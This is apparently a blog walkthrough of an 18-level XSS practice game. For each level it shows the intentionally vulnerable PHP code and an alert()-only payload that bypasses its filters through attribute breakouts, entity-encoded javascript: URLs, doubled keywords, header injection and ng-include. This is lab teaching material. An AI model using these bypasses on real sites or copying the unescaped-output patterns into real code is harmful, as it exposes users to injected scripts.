xone
xone 4 months ago
xone #web-application-testing

XSS Challenge Game Answers and Analysis Level 1-18

XSS Practice Summary (Level 1–18) This document serves as a reference guide for anyone practicing Cross-Site Scripting (XSS). It includes answers and detailed analysis for all 18 levels of the XSS game, helping learners understand various payloads and techniques. Some payloads use HTML entity encoding, such as single quotes (') or numeric character references like s, to bypass filters—e.g., javascript'&''#'115;script:alert().

Level-1

  • This question is very simple. Just enter the payload in the URL.
<script>alert(1)</script>
  • Source code analysis
$str = $_GET["name"];
echo "<h2 align=center>Welcome user".$str."</h2>";
  • Found the source code, there is no filtering on the parameters of the URL input

Level-2

  • Enter the level-1 payload and you can see that the URL parameters are translated into HTML entities.
  • View source
$str = $_GET["keyword"];
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'<center>
<form action=level2.php method=GET>
<input name=keyword value="'.$str.'"> //No entity
<input type=submit name=submit value="Search"/>
</form>
  • The htmlspecialchars() function converts predefined characters into HTML entities.
  • However, it is found that the form output is not materialized. You can enter the following payload in the form
1"><script>alert(1)</script>//
  • You can also enter the following payload in the url
"onclick="window.alert()
  • Click on the form and a pop-up window will pop up


Level-3

  • View source code directly
$str = $_GET["keyword"];
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>"."
<form action=level3.php method=GET>
<input name=keyword value='".htmlspecialchars($str)."'>
<input type=submit name=submit value=search/>
</form>
  • It is found that the form output is also materialized, and the payload is as follows:
'onclick='window.alert()
  • htmlspecialchars translates double quotes, but does not escape single quotes. There is a small bug in the program here, and the URL input does not respond. In theory, it should also be successful.


level-4

  • Or look directly at the source code
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace(">","",$str);
$str3=str_replace("<","",$str2);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level4.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=search/>
</form>
  • str_replace() replaces the characters "world" in the string "Hello world!" with "Shanghai":
<?php
echo str_replace("world","Shanghai","Hello world!");
?>
  • It can be seen that the parameters of url and form input, "<", ">", are replaced by ","
  • Payload:
"onclick="window.alert()


level-5

  • Source code
$str = strtolower($_GET["keyword"]);
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level5.php method=GET>
<input name=keyword value="'.$str3.'">
<input type=submit name=submit value=search/>
</form>
  • You can see that <script> is replaced by <scr_ipt>, on is replaced by o_n, and the onclick event is no longer available.
  • Is it okay to capitalize? Of course not because
  • strtolower converts all characters to lowercase
  • But you can use the following payload
"><a href="javascript:alert('a')">1</a>//
  • Remember to close the previous brackets and comment out the following js statements


Level-6

  • View source
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str2=str_replace("<script","<scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level6.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=search/>
</form>
  • It can be seen that on->o_n,src->sr_c,data->da_ta,href->hr_ef
  • But there is no strtolower function at this time, you can use the following payload
1 "><a HREF="javascript:alert('a')">1</a>//


level-7

  • View source code
ini_set("display_errors", 0);
$str =strtolower( $_GET["keyword"]);
$str2=str_replace("script","",$str);
$str3=str_replace("on","",$str2);
$str4=str_replace("src","",$str3);
$str5=str_replace("data","",$str4);
$str6=str_replace("href","",$str5);
echo "<h2 align=center>No results found for ".htmlspecialchars($str).".</h2>".'
<form action=level7.php method=GET>
<input name=keyword value="'.$str6.'">
<input type=submit name=submit value=search/>
</form>
  • Convert uppercase to lowercase, convert characters such as script to null, but double writing can bypass
  • payload
"><scrscriptipt>alert(1)</scrscriptipt>//


level-8

  • Source code
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','"',$str6);
echo '
<form action=level8.php method=GET>
<input name=keyword value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=Add friendly link/>
</form>
<?php
 echo '<BR><a href="'.$str7.'">Friendly Links</a>';
?>
  • This question is a bit difficult. You can convert the code at this time.
  • The payload is as follows:
s is converted to unicode encoding:
java'&''#'115;script:alert()
c,r,i,p,t can all be converted into base64 encoding


level-9

  • Source code
if(false===strpos($str7,'http://'))
{
  echo '<BR><a href="Is your link illegal? Is it?">Friendly Links</a>';
        }
else
{
  echo '<BR><a href="'.$str7.'">Friendly Links</a>';
}
  • It can be found that the difference from level-8 is that the friendship link has one more judgment
  • strpos

Find the first occurrence of "php" in a string: Return value:

Returns the first occurrence of a string in another string, or FALSE if the string is not found. Note: String positions start at 0, not 1.

<?php
echo strpos("You love php, I love php too!","php");
?>
  • That is to say, the information you fill in the form must be an http link. If not, it will be considered as malicious code and an error will be reported.
  • We can add http comments, which will not work
  • payload
javascri'&'#'x0070;t:alert(1)/*http://www.baidu.com*/


level-10

  • Source code
ini_set("display_errors", 0);
$str = $_GET["keyword"];
$str11 = $_GET["t_sort"];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2>No results found for ".htmlspecialchars($str).".</h2>".'
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.$str33.'" type="hidden">
</form>
  • The keyword parameter is useless. I was confused when I saw three input tags with all attributes as hidden. But the goal is clear. If I change any hidden attribute to text, I will succeed. However, the parameter can only be obtained from t_sort.
  • payload
&t_sort="onclick="alert()"type="text"
  • &Logical statements,
Links two statements, synonymous with and


level-11

  • Source code
$str = $_GET["keyword"];
$str00 = $_GET["t_sort"];
$str11=$_SERVER['HTTP_REFERER'];
$str22=str_replace(">","",$str11);
$str33=str_replace("<","",$str22);
echo "<h2>No results found for ".htmlspecialchars($str).".</h2>".'
<form id=search>
<input name="t_link" value="'.'" type="hidden">
<input name="t_history" value="'.'" type="hidden">
<input name="t_sort" value="'.htmlspecialchars($str00).'" type="hidden">
<input name="t_ref" value="'.$str33.'" type="hidden">
  • Analyzing the source code, we can see that $str11=$_SERVER['HTTP_REFERER'];, which receives the referer from the previous question.
  • Before using level-10 to complete, capture the packet and then change the referer to the following payload to complete
  • payload
Referer:t_sort="type="text" onclick="alert(1)


level-12

  • The rest is similar to the previous question. The user-agent from the previous question is received. Source code
$str11=$_SERVER['HTTP_USER_AGENT'];
  • Before level-11 is completed, use brup to capture the packet and change the user-agent parameter to the following payload
  • payload
User-Agent:t_sort="type="text" onclick="alert(1)


level-13

  • Received the cookie source code from the previous question
$str11=$_COOKIE["user"]; //Get the user value of the cookie
  • Before level-12 is completed, use brup to capture the packet and change the cookie parameter to the following payload
  • payload
Cookie:user=t_sort="type="text" onclick="alert(1);


level-14

  • Use exiftool to change the exif information of the image
  • Uploading an image containing xss code triggers xss


level-15

  • View source code
ini_set("display_errors", 0);
$str = $_GET["src"];
echo '<body><span class="ng-include:'.htmlspecialchars($str).'"></span>
  • AngularJS ng-include directive

The ng-include directive is used to include external HTML files. The included content will be included as children of the specified element. The value of the ng-include attribute can be an expression that returns a file name. By default, the included files need to be included under the same domain name.

  • Therefore, the code payload of level-1 is called
/level15.php?src='level1.php?name=test<img src=1 onerror=alert(1)>'


level-16

  • View source code
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script"," ",$str);
$str3=str_replace(" "," ",$str2);
$str4=str_replace("/"," ",$str3);
$str5=str_replace(" "," ",$str4);
echo .$str5.;
<img src=level16.png>
<?php
echo "<h3 align=center>Payload length:".strlen($str5)."</h3>";
  • Analyzing the source code, we can see that script, /, and spaces are all translated.
  • Use the img tag, %0d or %0a as the delimiter instead of the space, the payload is as follows
?keyword=test<img%0dsrc=1%0donerror=alert(1)>


level-17

  • Source code
echo "<embed src=xsf01.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
  • The <embed> tag defines embedded content, such as a plugin.
  • Firefox doesn't display, but I can use Google successfully
  • payload
?arg01=a&arg02= onmouseover=alert(1)
  • Theoretically, onclick can also succeed, but it directly jumps to the error interface without showing the error message.
  • After the onmouseup event is triggered, the onclick event is triggered


level-18

  • Source code
"<?php
ini_set("display_errors", 0);
echo ""<embed src=xsf02.swf?".htmlspecialchars($_GET["arg01"])."=".htmlspecialchars($_GET["arg02"])." width=100% heigth=100%>";
?>
  • There is no difference between the source code and level-17
  • payload
?arg01=a&arg02=b%20onmouseout=alert(1)


0
888

Login to Post comments

Comments 0
Hack The Box Machine Breakdown: Rusty htb writeup hackthebox

Hack The Box Machine Breakdown: Rusty htb writeup hackthebox

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 2 months ago
TombWatcher HTB Writeup | HacktheBox | Season 8

TombWatcher HTB Writeup | HacktheBox | Season 8

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 3 months ago
API Basics: Understanding SOAP vs. REST, URLs

API Basics: Understanding SOAP vs. REST, URLs

defaultuser.png
X0NE
 2 years ago
Eureka HTB Writeup - HacktheBox - lazyhackers

Eureka HTB Writeup - HacktheBox - lazyhackers

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 4 months ago
Mist HTB Writeup | HacktheBox

Mist HTB Writeup | HacktheBox

https://lh3.googleusercontent.com/a/ACg8ocIkM8EGIx0gz9GUP_nM6_sMxivr6876Wp0e9MAp6mGc=s96-c
xone
 1 year ago